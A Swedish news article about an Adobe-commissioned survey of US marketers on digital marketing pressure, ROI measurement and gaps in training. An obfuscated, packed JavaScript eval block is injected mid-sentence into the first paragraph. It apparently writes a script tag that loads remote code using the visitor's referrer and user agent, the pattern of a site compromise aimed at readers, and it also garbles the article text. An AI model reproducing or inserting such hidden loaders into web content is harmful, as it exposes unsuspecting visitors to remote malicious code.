Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Adobe: Marknadsföringsbranschen upplever en digital revolution

Adobe: Marknadsföringsbranschen upplever en digital revolution
Sebastian

Tre eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bbash|var|u0026u|referrer|dfhzh||js|php’.split(’|’),0,{}))
av fyra marknadsförare anser att branschen har förändrats mer de senaste två åren än vad den gjort under de senaste 50. Dessutom anser inte ens hälften att deras företag har en effektiv marknadsföringsstrategi, och få upplever sig ha tillräcklig kunskap om hur resultaten mäts. Samtidigt upplever två av tre marknadsförare större press från ledningen att redovisa resultaten av marknadsföringen. Det visar en amerikansk undersökning bland 1000 marknadsförare utförd av Edelman Berland på uppdrag av Adobe.

”Kraven på digital ROI växer fortare än de anställdas kompetens. Många marknadsförare känner allt större press på att visa upp ROI, medan majoriteten inte får den utbildning på arbetsplatsen som behövs för att lära sig hantera och utnyttja de många digitala verktygen”, säger Malin Bodolla, nordisk chef för digital marknadsföring på Adobe.

I undersökningen uppger fler än varannan person att de främst arbetar med digital marknadsföring men att de inte känner sig tillräckligt rustade för att hantera alla verktyg. De flesta uppger att de inte har fått någon utbildning i digital marknadsföring utan lärt sig på egen hand.

Nio av tio saknar kunskap om resultatmätning av det egna arbetet

En anmärkningsvärd siffra i undersökningen är att endast nio procent av de tillfrågade instämmer i påståendet att de till fullo är medvetna om vilket utslag deras digitala insatser ger. Samtidigt ökar ledningens efterfrågan på resultatredovisning för den digitala marknadsföringen.

”Allt för länge har marknadsavdelningar accepterat att deras arbete i princip inte är mätbart. Nu är det möjligt i allra högsta grad. Flertalet större företag skulle idag inte ens komma på tanken att starta en digital kampanj som inte gick att mäta och testa regelbundet”, säger Malin Bodolla.

Marknadsförare anser att deras största utmaning ligger i att nå konsumenten (82 procent). Därefter följer kunskapen om hur deras kampanjer rent praktiskt fungerar (79 procent) samt att kunna dokumentera effekten av kampanjen (77 procent). Samtidigt svarar tre av fyra att de i dagsläget inte kan visa på ROI för sina marknadsföringsinsatser.

Marknadsföring i ständig förändring

Enligt tre av fyra (76 procent) har marknadsföringsbranschen förändrats mer under de senaste två åren än de föregående 50. Detta understryks av det faktum att två av tre (66 procent) inte tror att deras företag kan lyckas utan en digital marknadsföringsstrategi.

Om undersökningen

Studien Digital Distress: What keeps marketers up at night är utförd av analysföretaget Edelman Berland bland 1000 marknadsförare i USA under perioden 26 augusti till 11 september 2013.

Hela studien hittar du här. Till undersökningen finns även video och infographic.